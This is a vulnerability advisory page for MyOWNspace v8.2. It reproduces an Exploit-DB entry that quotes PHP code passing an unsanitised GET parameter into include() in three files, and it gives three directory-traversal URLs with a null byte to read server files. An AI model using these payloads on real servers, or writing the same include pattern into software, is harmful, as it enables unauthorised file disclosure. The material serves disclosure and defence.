MyOWNspace_v8.2

vendor:

MyOWNspace_v8.2

by:

ItSecTeam

8,8

CVSS

HIGH

multi local file include

CWE

Product Name: MyOWNspace_v8.2

Affected Version From: MyOWNspace_v8.2

Affected Version To: MyOWNspace_v8.2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

MyOWNspace_v8.2 is vulnerable to multiple local file inclusion vulnerabilities. An attacker can exploit these vulnerabilities by sending a specially crafted HTTP request with malicious parameters. This can allow an attacker to include arbitrary files from the server, such as configuration files, which can lead to further exploitation.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated. Additionally, the application should be configured to only allow access to files that are necessary for the application to function.

Source

Exploit-DB raw data:

===========================================================================
( #Topic    : MyOWNspace_v8.2
( #Bug type : multi local file include
( #Download : http://sourceforge.net/project/platformdownload.php?group_id=174729
( #Advisory : 

===========================================================================
( #Author : ItSecTeam
( #Email  : Bug@ITSecTeam.com
( #Website: http://www.itsecteam.com
( #Forum  : http://forum.ITSecTeam.com
( #discovered by : ahmadbady

vuls:===================================================================
path/graph.php

if (isset($_GET['go'])) {$go=$_GET['go']; line 28   

$i=$go;                                   line 30   
.
.
.
$friends="myownfriends/friends.".$i.".php";  line 38
include $friends;                            line 39
.
.
.
.
.
$friends="myownfriends/friends.".$i.".php"; line 74  
include $friends;                           line 75  
---------------------------------------------------------------------------
path/myowngraph.php  eror graph.php line 39;

if (isset($_GET['go'])) {$go=$_GET['go']; line 28

$i=$go;                                    line 29

include $friends; line 39
---------------------------------------------------------------------------
path/showmyownfriends.php

$conf_file="myownfriends/friends.".$_GET['go'].".php"; line 3

include $conf_file;                                    line 17 
---------------------------------------------------------------------------
exploit:===================================================================

path/graph.php?go=../../../../../../../boot.ini%00
path/myowngraph.php?go=../../../../../../../boot.ini%00
path/showmyownfriends.php?go=../../../../../../../boot.ini%00
---------------------------------------------------------------------------